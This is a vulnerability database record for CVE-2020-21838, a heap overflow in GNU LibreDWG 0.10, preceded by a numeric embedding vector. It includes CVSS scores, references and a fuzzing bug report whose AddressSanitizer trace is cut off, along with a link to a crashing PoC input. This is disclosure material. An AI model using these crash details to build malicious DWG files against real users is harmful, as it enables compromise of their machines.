0.0010166573338210583, 0.02041718363761902, 0.01538961660116911, -0.017581868916749954, -0.014161954633891582, -0.003843750339001417, -0.0076363482512533665, -0.0041031669825315475, -0.0001161209074780345, 0.007957878522574902, 0.0026672412641346455, 0.011560481041669846, -0.019905658438801765, 0.0042456635273993015, -0.013102365657687187, 0.0007572407484985888, -0.009835909120738506, -0.0012705933768302202, 0.00787749607115984, -0.011297410354018211, -0.00506775826215744, -0.011063570156693459, 0.013708889484405518, 0.02737393230199814, 0.0165149737149477, -0.0015373174101114273, -0.00616388488560915, -0.031656134873628616, -0.018692610785365105, 0.015199621208012104, -0.02364710345864296, 0.007935956120491028, 0.03288379684090614, -0.0033121290616691113, -0.002617915626615286, -0.027242397889494896, -0.004070283379405737, 0.005268714856356382, 0.00860824715346098, 0.007687500678002834, 0.010880882851779461, -0.0009353613131679595, 0.019803352653980255, 0.0015090008964762092, 0.0140158049762249, 0.020841019228100777, -0.010705502703785896, 0.012671222910284996, 0.013986574485898018, 0.006799638271331787, 0.03338070586323738, 0.010537429712712765, -0.018794916570186615, 0.01641266793012619, -0.00247724587097764, -0.027987763285636902, 0.0011655478738248348, 0.019247982650995255, 0.021206393837928772, -0.02079717442393303, -0.024436313658952713, -0.002437054645270109, 0.010245129466056824, 0.014454254880547523, 0.026204731315374374, -0.014600405469536781, -0.000022778878701501526, -0.0030655006412416697, 0.017742633819580078, -0.02211252599954605, -0.016821889206767082, -0.010478969663381577, 0.033819157630205154, -0.015053470619022846, -0.006141962483525276, 0.004629307892173529, -0.00984321627765894, 0.004457581322640181, -0.0005224869819357991, -0.004771803971379995, -0.011027032509446144, 0.0026124347932636738, -0.01999334804713726, 0.008564402349293232, -0.007994416169822216, -0.014607712626457214, 0.015667302533984184, -0.013255823403596878, -0.011794321238994598, 0.013365436345338821, -0.003788944100961089, -0.015769606456160545, 0.0007481063366867602, 0.015448076650500298, 0.0005371019942685962, 0.02316480688750744, 0.006649834103882313, 0.023354802280664444, 0.002532052341848612, -0.007216166239231825, -0.020490258932113647, -0.005941005889326334, -0.016675738617777824, 0.010113594122231007, 0.01270776055753231, 0.007862880825996399, 0.021688690409064293, 0.013679658994078636, -0.001381119480356574, -0.02604396641254425, 0.01835646480321884, -0.023661717772483826, 0.006160231307148933, -0.015360386110842228, -0.012371614575386047, -0.0008339696214534342, 0.043932750821113586, 0.0023859019856899977, -0.009609376080334187, -0.002332922536879778, 0.00860824715346098, -0.0027330087032169104, -0.0229455828666687, -0.01578422263264656, 0.01752340979874134, -0.004490464925765991, -0.014330027624964714, -0.02163022942841053, 0.015798836946487427, 0.0037195226177573204, 0.0013482356444001198, -0.009967443533241749, -0.004187203478068113, -0.04238355904817581, -0.026277806609869003, -0.017581868916749954, 0.023310957476496696, 0.020256418734788895, 0.016091138124465942, -0.0026635874528437853, -0.01493655052036047, -0.0008348830160684884, -0.003843750339001417, 0.00030052135116420686, -0.008425558917224407, 0.016281133517622948, -0.006174846086651087, 0.006854444742202759, -0.004099513404071331, 0.0031732863280922174, 0.03443298861384392, -0.006215037312358618, -0.0011189625365659595, -0.013533509336411953, 0.010427816770970821, 0.003447317983955145, 0.0038072129245847464, -0.01961335726082325, -0.008827472105622292, -0.02486014924943447, 0.0019200482638552785, -0.02107485942542553, -0.003430875949561596, 0.00888593215495348, 0.004256624728441238, -0.0022580206859856844, -0.012539687566459179, -0.019174907356500626, -0.019116446375846863, -0.007409815210849047, -0.0033523202873766422, 0.000690102984663099, -0.021396389231085777, 0.004282201174646616, -0.012568917125463486, -0.0006088069640100002, -0.010055134072899818, -0.028104683384299278, -0.018897220492362976, -0.013314283452928066, -0.00579850934445858, -0.011209720745682716, 0.0018524538027122617, -0.009302460588514805, -0.017362644895911217, -0.002053410280495882, 0.009835909120738506, -0.0015153948916122317, 0.014403102919459343, -0.020577948540449142, -0.019759507849812508, -0.00591177586466074, 0.008937085047364235, 0.011114723049104214, 0.01319736335426569, -0.0063027273863554, -0.0011902106925845146, -0.0043370071798563, 0.009156309999525547, -0.0011417984496802092, -0.017260339111089706, 0.000358753080945462, 0.024041708558797836, -0.009558223187923431, -0.005279676057398319, 0.009638605639338493, 0.013065828010439873, -0.0009499763255007565, -0.0017793787410482764, -0.010895498096942902, -0.042412787675857544, 0.0002728898252826184, 0.014088879339396954, -0.003365108510479331, -0.02281404659152031, 0.009441303089261055, 0.008856702595949173, -0.004274893552064896, 0.019701046869158745, -0.0039935545064508915, 0.004775458015501499, -0.0088347801938653, -0.008315946906805038, -0.0007796200225129724, -0.01731879822909832, 0.011158567853271961, 0.043202001601457596, -0.004044706933200359, 0.015477306209504604, 0.003401645924896002, 0.013277745805680752, 0.006459839176386595, -0.003803559113293886, 0.01606190763413906, 0.0014176570111885667, 0.0066242581233382225, -0.008286716416478157, 0.008856702595949173, -0.0025558017659932375, -0.022799432277679443, 0.015345771797001362, -0.007307510357350111, 0.006777715869247913, 0.0182249303907156, 0.00441739009693265, -0.0008344263187609613, 0.016602663323283195, 0.008279409259557724, -0.028177758678793907, -0.025751665234565735, -0.00018257358169648796, 0.012766220606863499, 0.014256952330470085, 0.007855573669075966, -0.009141695685684681, 0.004559886176139116, 0.008783627301454544, -0.012276616878807545, 0.02412939816713333, -0.0038802879862487316, -0.020461028441786766, 0.008776320144534111, 0.028733130544424057, -0.0017373604932799935, 0.01495116576552391, 0.0011737687746062875, -0.030720772221684456, 0.017084958031773567, -0.0056121679954230785, -0.0126054547727108, -0.0023840751964598894, -0.023354802280664444, -0.012167004868388176, 0.009587453678250313, -0.008717860095202923, 0.0029357923194766045, 0.005418519023805857, -0.024699384346604347, -0.007526735309511423, -0.007165013812482357, 0.018137240782380104, 0.019759507849812508, -0.015243466012179852, 0.00021728425053879619, -0.021513309329748154, -0.003949709236621857, -0.0229455828666687, -0.011677401140332222, -0.02135254442691803, 0.026628566905856133, 0.017011884599924088, -0.02462630905210972, -0.005780240520834923, 0.02301865629851818, -0.005232177209109068, 0.020285647362470627, 0.01644189842045307, 0.018034934997558594, -0.03720984235405922, 0.002873678458854556, -0.003050885396078229, 0.02065102383494377, 0.023603258654475212, -0.016500357538461685, -0.00970437377691269, -0.026789331808686256, 0.008199026808142662, 0.014622327871620655, -0.0036811581812798977, -0.011012418195605278, -0.005846008192747831, 0.0035806798841804266, -0.01989104226231575, 0.00555370794609189, -0.011743169277906418, -0.0038802879862487316, -0.031480755656957626, -0.003858365351334214, 0.0039606704376637936, 0.01333620585501194, 0.00890054740011692, -0.004004515707492828, -0.020402569323778152, -0.0017099573742598295, 0.02559090033173561, -0.01012090127915144, 0.008337869308888912, -0.00441739009693265, 0.02468477003276348, -0.013021983206272125, -0.00975552573800087, -0.02395401895046234, 0.0024534964468330145, -0.01724572479724884, 0.008074798621237278, 0.01676342822611332, 0.00047498816275037825, -0.009748218581080437, 0.014388487674295902, 0.006697332952171564, 0.0038912491872906685, -0.007175975013524294, 0.005619475152343512, 0.001885337638668716, -0.0088347801938653, -0.0008572622900828719, 0.0011427119607105851, 0.004439312499016523, -0.008915162645280361, 0.01739187352359295, 0.00408489815890789, -0.0003614933812059462, -0.022054065018892288, -0.004687767941504717, -0.008060183376073837, -0.009609376080334187, -0.012802758254110813, -0.018692610785365105, -0.013401973992586136, -0.04203279688954353, 0.006839829497039318, 0.011034340597689152, 0.013876961544156075, -0.0038875953759998083, -0.004632961470633745, 0.01648574322462082, 0.007585195358842611, 0.004402774851769209, -0.0036976002156734467, -0.004833918064832687, 0.010193976573646069, -0.006598681677132845, -0.006697332952171564, -0.011787014082074165, -0.0342283770442009, 0.03007771261036396, -0.00852055661380291, 0.00865939911454916, -0.019277211278676987, -0.002815218409523368, 0.014900012873113155, 0.01648574322462082, -0.008462096564471722, 0.001252324553206563, -0.021294085308909416, -0.021717920899391174, 0.0046804603189229965, 0.019657202064990997, -0.0017793787410482764, 0.0028481020126491785, 0.018239544704556465, 0.004735266789793968, -0.024801690131425858, -0.02225867658853531, 0.006931173615157604, -0.013884269632399082, 0.012232772074639797, -0.0029357923194766045, -0.023734793066978455, -0.0022196562495082617, -0.00568524282425642, 0.013387358747422695, 0.001012090127915144, 0.01394272968173027, -0.021893300116062164, -0.00015220174100250006, -0.0018762032268568873, -0.018283391371369362, -0.0013975612819194794, -0.018210316076874733, 0.00925130769610405, -0.02069486863911152, -0.02445092983543873, -0.005827739369124174, 0.02389555796980858, 0.0038729803636670113, 0.003235400188714266, -0.0031330951023846865, -0.0034071265254169703, 0.020110268145799637, 0.010544736869633198, 0.029990021139383316, -0.0066242581233382225, -0.007417122833430767, -0.010698194615542889, -0.0024133052211254835, 0.003518566256389022, -0.013365436345338821, 0.022872507572174072, 0.0008896893705241382, 0.017538024112582207, -0.01797647587954998, -0.014454254880547523, 0.005729088094085455, 0.002632530638948083, 0.029960792511701584, -0.018794916570186615, 0.011465483345091343, -0.023047886788845062, 0.005542746279388666, 0.004461234901100397, 0.0037359646521508694, -0.010106286965310574, 0.011165875941514969, -0.015550381503999233, 0.0045708478428423405, -0.021601000800728798, -0.004874109290540218, -0.007143091410398483, -0.020139498636126518, -0.0030052135698497295, -0.013292361050844193, -0.008272101171314716, -0.023837098851799965, 0.021367160603404045, 0.007417122833430767, 0.009368227794766426, -0.017991090193390846, 0.004399121273308992, 0.0008947132737375796, 0.012093929573893547, -0.016675738617777824, 0.0009874273091554642, -0.01853184588253498, -0.019671818241477013, 0.020636409521102905, 0.003408953547477722, 0.006989633664488792, 0.007468275260180235, -0.01050089206546545, 0.01124625839293003, 0.006708294153213501, 0.002009565243497491, -0.00034642164246179163, -0.007490198127925396, -0.00726001150906086, -0.020124882459640503, 0.013321591541171074, -0.012956216000020504, -0.007643655873835087, 0.011041647754609585, -0.01218892727047205, -0.01986181177198887, -0.002672721864655614, 0.00617119250819087, 0.013328898698091507, 0.0026654142420738935, 0.00029755267314612865, -0.0036683701910078526, 0.012663914822041988, 0.019394131377339363, 0.001210306421853602, 0.010559352114796638, 0.009718988090753555, -0.011743169277906418, 0.008703244850039482, -0.006459839176386595, -0.0008828385616652668, 0.006931173615157604, 0.008454789407551289, -0.017961859703063965, -0.00001778351179382298, 0.005162755958735943, -0.0011162222363054752, 0.027286242693662643, 0.02594166062772274, -0.00028613468748517334, -0.004242009483277798, -0.00393874803557992, -0.01150932814925909, 0.014666172675788403, 0.009675143286585808, -0.011889318935573101, -0.006587720476090908, -0.0011938645038753748, 0.0009349045576527715, -0.010690887458622456, -0.007577888201922178, -0.0016259209951385856, 0.015009625814855099, 0.020139498636126518, 0.006985979620367289, -0.012430074624717236, -0.012020854279398918, -0.006890981923788786, 0.014549252577126026, -0.0054002502001821995, -0.03241611644625664, -0.009887061081826687, 0.0011938645038753748, 0.0425589382648468, -0.010471662506461143, -0.0004491835134103894, -0.0019163945689797401, 0.02545936591923237, 0.008871316909790039, -0.020081037655472755, 0.028879281133413315, -0.0058058169670403, 0.007643655873835087, 0.0068471371196210384, -0.011604325845837593, -0.007943263277411461, 0.016894962638616562, 0.017128804698586464, 0.01392811443656683, -0.018064165487885475, 0.003967978060245514, 0.005118910688906908, 0.003840096527710557, -0.007672885898500681, -0.0021465811878442764, -0.001673419843427837, -0.03452067822217941, -0.001380205969326198, -0.024699384346604347, -0.009821293875575066, -0.0027786807622760534, -0.016295747831463814, -0.012612762860953808, 0.009499763138592243, 0.041360508650541306, -0.015915757045149803, -0.015491921454668045, 0.004019130486994982, -0.006160231307148933, 0.0005562842125073075, 0.001506260596215725, 0.02496245503425598, 0.000942668819334358, 0.00961668323725462, -0.006204076111316681, -0.007526735309511423, -0.012408152222633362, 0.012247387319803238, 0.008652091957628727, 0.002303692512214184, 0.012612762860953808, 0.0015153948916122317, 0.004150665830820799, 0.025079375132918358, 0.022624051198363304, 0.005951967090368271, -0.008038260973989964, -0.018926450982689857, -0.008637476712465286, -0.0038474041502922773, -0.000577750033698976, -0.00021831186313647777, -0.010164747014641762, -0.016894962638616562, -0.00393874803557992, -0.01172124594449997, 0.0025101297069340944, 0.005345443729311228, -0.029653877019882202, -0.010011289268732071, 0.0018497135024517775, -0.008776320144534111, 0.0007257271208800375, 0.012788143008947372, -0.01058858260512352, 0.022024836391210556, 0.01648574322462082, 0.017508793622255325, -0.013255823403596878, -0.0006805118755437434, 0.012262002564966679, -0.0033157826401293278, 0.0030198285821825266, -0.009207462891936302, -0.013409281149506569, 0.023603258654475212, -0.010186669416725636, -0.016398053616285324, -0.02138177491724491, 0.00998205877840519, -0.027841614559292793, -0.0035130854230374098, -0.005696204025298357, 0.0068361759185791016, 0.019730277359485626, -0.00041584300925023854, 0.019247982650995255, -0.006014080718159676, 0.008206333965063095, -0.004980068188160658, 0.00925130769610405, -0.01835646480321884, 0.004161627031862736, -0.023793254047632217, -0.01100511010736227, -0.018239544704556465, -0.016018062829971313, -0.03060385212302208, -0.011056262999773026, 0.008177103474736214, 0.009499763138592243, 0.004424697253853083, 0.011428945697844028, -0.01958412677049637, 0.007157706189900637, 0.002396863419562578, 0.007775190751999617, -0.0031842475291341543, -0.007230781484395266, -0.0031276142690330744, -0.0036793313920497894, 0.0023237881250679493, 0.00926592294126749, -0.000647171342279762, -0.012254694476723671, 0.01610575243830681, 0.013993881642818451, 0.033994536846876144, -0.015550381503999233, 0.008666707202792168, 0.010077056474983692, -0.024977069348096848, -0.00222148303873837, -0.013591969385743141, -0.011253565549850464, 0.02629242092370987, 0.014330027624964714, 0.020387953147292137, -0.0069275195710361, 0.007789805997163057, 0.0268770232796669, 0.009872445836663246, -0.01696803793311119, 0.0007047179969958961, 0.010003981180489063, 0.000605609908234328, -0.014907320961356163, -0.008542479015886784, -0.011019725352525711, -0.008564402349293232, -0.011282796040177345, 0.0006124607170931995, 0.0033541470766067505, 0.003788944100961089, 0.01368696615099907, -0.030866922810673714, -0.005506209097802639, -0.00825748685747385, -0.003363281488418579, 0.00018474299577064812, 0.01124625839293003, 0.020841019228100777, -0.01058858260512352, -0.02301865629851818, -0.02291635237634182, 0.010793192312121391, 0.027549313381314278, -0.007694808300584555, -0.0008645697962492704, 0.021761765703558922, -0.01283198781311512, 0.005922737065702677, 0.007848265580832958, 0.03133460506796837, 0.00888593215495348, 0.01057396735996008, -0.016076521947979927, 0.002407824620604515, -0.027169322595000267, -0.0016871214611455798, -0.006116386037319899, 0.00667541055008769, -0.00990898348391056, -0.005648705177009106, -0.02253636159002781, 0.013051212765276432, 0.0033450128976255655, -0.02316480688750744, 0.002349364571273327, -0.016222672536969185, 0.003997208084911108, -0.023515567183494568, 0.014790400862693787, -0.0135773541405797, 0.012356999330222607, 0.01696803793311119, -0.03203612565994263, 0.014286182820796967, 0.004958145786076784, -0.005403903778642416, 0.00615657726302743, 0.0103620495647192, 0.02037333883345127, -0.018385695293545723, -0.0032883796375244856, 0.015082701109349728, 0.0026215692050755024, -0.013416588306427002, 0.010581274516880512, 0.008045569062232971, -0.012568917125463486, 0.013168133795261383, 0.006295420229434967, -0.0039314404129981995, 0.00022756043472327292, 0.010077056474983692, 0.012956216000020504, 0.002420612843707204, -0.010975880548357964, -0.009222078137099743, 0.005758318118751049, 0.019569512456655502, 0.007205205038189888, -0.0229455828666687, -0.029288500547409058, -0.008440174162387848, 0.02374940738081932, 0.0028079107869416475, 0.016251903027296066, 0.007965185679495335, -0.013233901001513004, -0.04036668688058853, -0.010983187705278397, -0.0073111639358103275, -0.0045087337493896484, -0.018020320683717728, 0.004117781762033701, -0.009507070295512676, -0.0008659399463795125, 0.014790400862693787, -0.016076521947979927, -0.021513309329748154, 0.0029759835451841354, 0.01435925718396902, -0.01131933368742466, 0.0014441467355936766, 0.00015802490815985948, 0.012992752715945244, 0.013862347230315208, -0.003401645924896002, -0.027490854263305664, 0.028455445542931557, 0.0012879486894235015, -0.013255823403596878, -0.0034217415377497673, -0.01531654130667448, 0.004545271396636963, -0.009470533579587936, 0.016018062829971313, -0.0030088673811405897, -0.003487509209662676, 0.0007841871702112257, 0.010157438926398754, -0.008147873915731907, -0.002756758127361536, 0.009470533579587936, -0.003745099063962698, 0.00284262141212821, 0.03440375626087189, -0.014622327871620655, 0.026920868083834648, 0.02753469906747341, -0.013051212765276432, 0.003810866503044963, 0.012671222910284996, 0.0063794562593102455, 0.012663914822041988, -0.018561076372861862, -0.00015277264174073935, 0.015871912240982056, 0.003774329088628292, 0.010763962753117085, 0.001239536446519196, 0.0054075573571026325, 0.024041708558797836, -0.003502124221995473, 0.014074265025556087, -0.0067046405747532845, -0.015550381503999233, 0.007716730702668428, 0.00045260891783982515, -0.005564669147133827, -0.009258615784347057, -0.03633293882012367, 0.00917823240160942, 0.006036003585904837, -0.0050458358600735664, -0.012890447862446308, 0.018721841275691986, 0.014351950027048588, -0.012956216000020504, -0.00912708044052124, -0.007526735309511423, -0.008140566758811474, 0.014403102919459343, 0.014593098312616348, 0.016602663323283195, 0.0072709727101027966, 0.004380852449685335, -0.006258882582187653, 0.0023055195342749357, 0.0029010814614593983, -0.011604325845837593, 0.023413263261318207, -0.034374527633190155, -0.005159102380275726, 0.0014140031998977065, 0.005283329635858536, -0.006569451652467251, 0.00963129848241806, -0.006233306135982275, -0.0017538024112582207, -0.0015236159088090062, 0.0034783747978508472, 0.010193976573646069, -0.012130467221140862, 0.009295152500271797, -0.0004841225454583764, -0.00466949911788106, 0.00253387913107872, 0.033789925277233124, -0.016880348324775696, 0.013643121346831322, 0.010932034812867641, 0.005352751351892948, -0.014965781010687351, -0.010800500400364399, -0.007548658177256584, 0.0138550391420722, -0.005933698266744614, 0.016266517341136932, 0.0019931234419345856, -0.01898491196334362, -0.010449739173054695, 0.013504278846085072, 0.010807807557284832, 0.000047498815547442064, -0.005864277016371489, -0.029288500547409058, 0.011063570156693459, 0.022872507572174072, 0.009470533579587936, 0.0026672412641346455, 0.013460434041917324, -0.023968633264303207, 0.0014240510063245893, 0.015813451260328293, 0.003598948707804084, -0.00031856176792643964, -0.0012048257049173117, -0.004877762869000435, -0.02089947834610939, -0.01408157218247652, -0.013255823403596878, -0.017260339111089706, 0.003701254026964307, 0.003067327430471778, 0.017742633819580078, 0.017757249996066093, -0.004059321712702513, 0.02114793471992016, 0.0013263131259009242, -0.008710552006959915, -0.023983247578144073, 0.0004909733543172479, 0.01197700947523117, 0.003648274578154087, -0.008140566758811474, -0.00043982078204862773, -0.0018780301325023174, 0.0005567409098148346, -0.0030746348202228546, 0.021601000800728798, -0.010581274516880512, -0.01568191684782505, 0.005111603531986475, 0.014746555127203465, 0.03411145880818367, 0.01888260617852211, 0.0002993795496877283, 0.0123277697712183, -0.009792063385248184, -0.005535439122468233, -0.01981796696782112, -0.012561609968543053, -0.0019310095813125372, 0.008111336268484592, -0.00035144557477906346, 0.010383971966803074, 0.00954360794275999, 0.002676375675946474, -0.0036373131442815065, 0.029858486726880074, 0.0018515404080972075, 0.0038729803636670113, 0.0029230040963739157, 0.003854711540043354, -0.0009106984362006187, -0.01842954009771347, -0.0165149737149477, -0.005038528237491846, 0.0006759446696378291, -0.010661656968295574, 0.02448015846312046, 0.005148140713572502, 0.01333620585501194, 0.017728019505739212, -0.011896627023816109, -0.006861751899123192, 0.024801690131425858, 0.0179472453892231, 0.004753535147756338, 0.010603196918964386, -0.0012961695902049541, -0.002135619753971696, 0.021089473739266396, 0.008951700292527676, 0.02132331393659115, 0.002420612843707204, 0.016193442046642303, -0.012963523156940937, -0.011903934180736542, 0.014688095077872276, -0.005597552750259638, 0.00431143119931221, 0.006240613758563995, -0.00047087768325582147, 0.01172124594449997, -0.014505407772958279, 0.0004658537800423801, -0.0004658537800423801, 0.016704969108104706, 0.02392478846013546, -0.006960403639823198, -0.01318274810910225, -0.02412939816713333, 0.025707820430397987, 0.009514378383755684, -0.027315473183989525, 0.010910112410783768, -0.008542479015886784, 0.03776521235704422, -0.010895498096942902, -0.0036391401663422585, -0.01933567225933075, -0.007914033718407154, -0.011969701386988163, 0.0071686673909425735, 0.004826610442250967, 0.024348624050617218, -0.017464948818087578, -0.0032573225907981396, 0.014666172675788403, -0.008162489160895348, -0.017508793622255325, 0.021294085308909416, -0.0008759878110140562, 0.00940476544201374, -0.016924193128943443, -0.008652091957628727, -0.018312619999051094, 0.0023420569486916065, 0.005586591549217701, -0.0055098626762628555, -0.006430609151721001, -0.001151846256107092, -0.009185540489852428, -0.019627971574664116, -0.01752340979874134, 0.003774329088628292, -0.00492891576141119, -0.0018213968724012375, -0.025722436606884003, 0.0353391207754612, 0.00787749607115984, 0.013591969385743141, 0.004424697253853083, -0.006817907094955444, -0.008425558917224407, -0.0031751131173223257, -0.036040641367435455, 0.01926259696483612, 0.009660528041422367, -0.009068620391190052, -0.007811728399246931, -0.0006129174144007266, -0.007592502981424332, -0.010106286965310574, -0.003803559113293886, -0.007702115923166275, 0.007716730702668428, -0.004293162375688553, 0.015842681750655174, 0.008089413866400719, 0.0011016071075573564, 0.014213107526302338, 0.009463225491344929, -0.020051807165145874, -0.000731207721401006, -0.00903938990086317, -0.005948313511908054, 0.007439045235514641, 0.003703080816194415, -0.012766220606863499, -0.0017401009099557996, -0.004088551737368107, 0.006649834103882313, 0.0034674135968089104, -0.006660795770585537, -0.0033596279099583626, -0.015170390717685223, 0.02059256285429001, 0.006975018419325352, -0.010201284661889076, 0.008688629604876041, -0.009068620391190052, 0.014395794831216335, 0.00222148303873837, -0.013555431738495827, -0.003337705275043845, -0.018561076372861862, 0.02475784532725811, -0.016281133517622948, 0.006821560673415661, -0.02427554875612259, -0.011224335990846157, 0.01123164314776659, 0.011363178491592407, -0.027797767892479897, 0.01658804900944233, 0.01693880930542946, -0.005615821573883295, 0.025751665234565735, -0.01430810522288084, 0.019759507849812508, -0.007442699279636145, -0.020081037655472755, 0.016997268423438072, 0.013175440952181816, 0.00013256279635243118, 0.015272696502506733, 0.003854711540043354, -0.01371619664132595, -0.015769606456160545, -0.0029467535205185413, 0.01575499214231968, -0.00021831186313647777, -0.010552044957876205, -0.011940471827983856, -0.03685908019542694, -0.021922530606389046, -0.016573432832956314, -0.014995010569691658, -0.0028371408116072416, 0.011955087073147297, -0.012671222910284996, 0.0037067346274852753, -0.011290103197097778, -0.0047206515446305275, 0.010047826915979385, 0.01593037135899067, -0.008717860095202923, -0.005191985983401537, -0.0020314878784120083, -0.005736395716667175, -0.00039232196286320686, 0.050538741052150726, 0.002760411938652396, 0.007870188914239407, 0.011560481041669846, -0.004315084777772427, -0.017932629212737083, 0.005071411840617657, -0.015272696502506733, -0.009952829219400883, -0.0036957731936126947, -0.003986246883869171, 0.0073842392303049564, 0.0010778577998280525, -0.015418846160173416, -0.003107518656179309, -0.0007636348018422723, 0.0067046405747532845, -0.009748218581080437, -0.013277745805680752, -0.023033272475004196, -0.004048360511660576, -0.005228523630648851, 0.0016770735383033752, -0.01978873834013939, -0.02016872726380825, 0.000046385561290662736, -0.001013917033560574, -0.02253636159002781, -0.010661656968295574, -0.025371676310896873, 0.014914628118276596, -0.012656607665121555, -0.00617119250819087, -0.004910646937787533, 0.01731879822909832, 0.009426687844097614, 0.014549252577126026, 0.021294085308909416, -0.02670164220035076, -0.008432867005467415, -0.0012952561955899, -0.007738653104752302, -0.014110801741480827, 0.01696803793311119, -0.025576286017894745, 0.022419441491365433, -0.006448877975344658, 0.038028281182050705, 0.019452592357993126, 0.03490066900849342, -0.0029924253467470407, 0.006342919077724218, 0.012386229820549488, 0.009667836129665375, 0.02256559208035469, 0.0070590549148619175, 0.007110207341611385, -0.010303589515388012, -0.02876236103475094, -0.007091938517987728, 0.010771269910037518, -0.0012304020347073674, -0.018371080979704857, -0.015345771797001362, -0.016368823125958443, -0.012905063107609749, 0.01784493960440159, 0.008703244850039482, -0.002449842868372798, 0.0364498607814312, -0.01270776055753231, -0.0021045629400759935, -0.014892705716192722, -0.021644845604896545, -0.004380852449685335, -0.03387761861085892, -0.007197897415608168, -0.004234702326357365, 0.011224335990846157, -0.000563135021366179, -0.006591374054551125, -0.01530192606151104, 0.013891576789319515, -0.0024516696576029062, 0.014527330175042152, -0.0070261708460748196, 0.004870455712080002, 0.004757189191877842, -0.009433995932340622, -0.0012075660051777959, 0.030136171728372574, 0.0068142530508339405, -0.02034410834312439, -0.022872507572174072, 0.012203541584312916, 0.00044689991045743227, 0.002027834067121148, 0.014892705716192722, 0.0017428412102162838, 0.004099513404071331, 0.028806205838918686, -0.0024717652704566717, -0.015988832339644432, -0.0037067346274852753, 0.0004891464486718178, -0.007585195358842611, 0.018736455589532852, -0.014600405469536781, -0.03598218038678169, 0.01807877980172634, 0.009061312302947044, -0.005276022478938103, -0.007227127440273762, -0.006510991603136063, 0.0083963293582201, 0.012649300508201122, 0.007380585186183453, -0.01158240344375372, -0.00456354022026062, 0.021717920899391174, -0.02148408070206642, -0.003843750339001417, -0.005586591549217701, -0.002475419081747532, -0.025020914152264595, 0.009419380687177181, 0.007928648963570595, 0.012503149919211864, 0.005491593852639198, -0.011180490255355835, 0.005279676057398319, 0.0035697186831384897, 0.01885337568819523, 0.028396984562277794, 0.014753863215446472, 0.007994416169822216, 0.003997208084911108, 0.01197700947523117, -0.00019147960119880736, 0.009346305392682552, 0.015696531161665916, 0.01086626760661602, -0.0010157439392060041, -0.012254694476723671, -0.01631036214530468, 0.007687500678002834, -0.0046110390685498714, -0.018093395978212357, -0.009426687844097614, -0.003377896500751376, 0.014337334781885147, 0.00739885400980711, 0.00824287161231041, -0.011085492558777332, 0.009682451374828815, 0.005455056205391884, -0.0006033263052813709, 0.025181680917739868, -0.016120366752147675, 0.01172124594449997, -0.0056925504468381405, 0.022974811494350433, -0.0014441467355936766, -0.009901676326990128, 0.006463492754846811, -0.0056779352016747, 0.0025923391804099083, 0.007439045235514641, 0.014980396255850792, -0.007245396263897419, -0.029376190155744553, 0.0023438839707523584, 0.010975880548357964, -0.018999526277184486, 0.019934887066483498, -0.0032573225907981396, 0.014074265025556087, 0.02152792550623417, 0.027768539264798164, 0.02601473592221737, 0.005893507041037083, 0.012495842762291431, -0.01676342822611332, -0.004019130486994982, 0.011502020992338657, -0.0033724159002304077, -0.0027220475021749735, -0.006320996209979057, 0.005254099611192942, -0.002561282366514206, -0.008542479015886784, -0.014629635028541088, 0.002632530638948083, 0.005162755958735943, -0.0005485200090333819, 0.018970295786857605, -0.0029357923194766045, -0.01996411755681038, 0.01623728685081005, -0.0176695603877306, 0.011333948001265526, -0.01173586118966341, 0.006719255819916725, 0.00591908348724246 ]
CVE-2020-21838
2021-05-17T21:15:07.493000
A heap based buffer overflow vulnerability exits in GNU LibreDWG 0.10 via: read_2004_section_appinfo ../../src/decode.c:2842.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Not Applicable" ], "url": "http://gnu.com" }, { "source": "[email protected]", "tags": [ "Broken Link" ], "url": "http://libredwg.com" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574492816" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.10:*:*:*:*:*:*:*", "matchCriteriaId": "C3E7D34E-1D80-4CF0-8110-412C6D8514EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574492816
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in 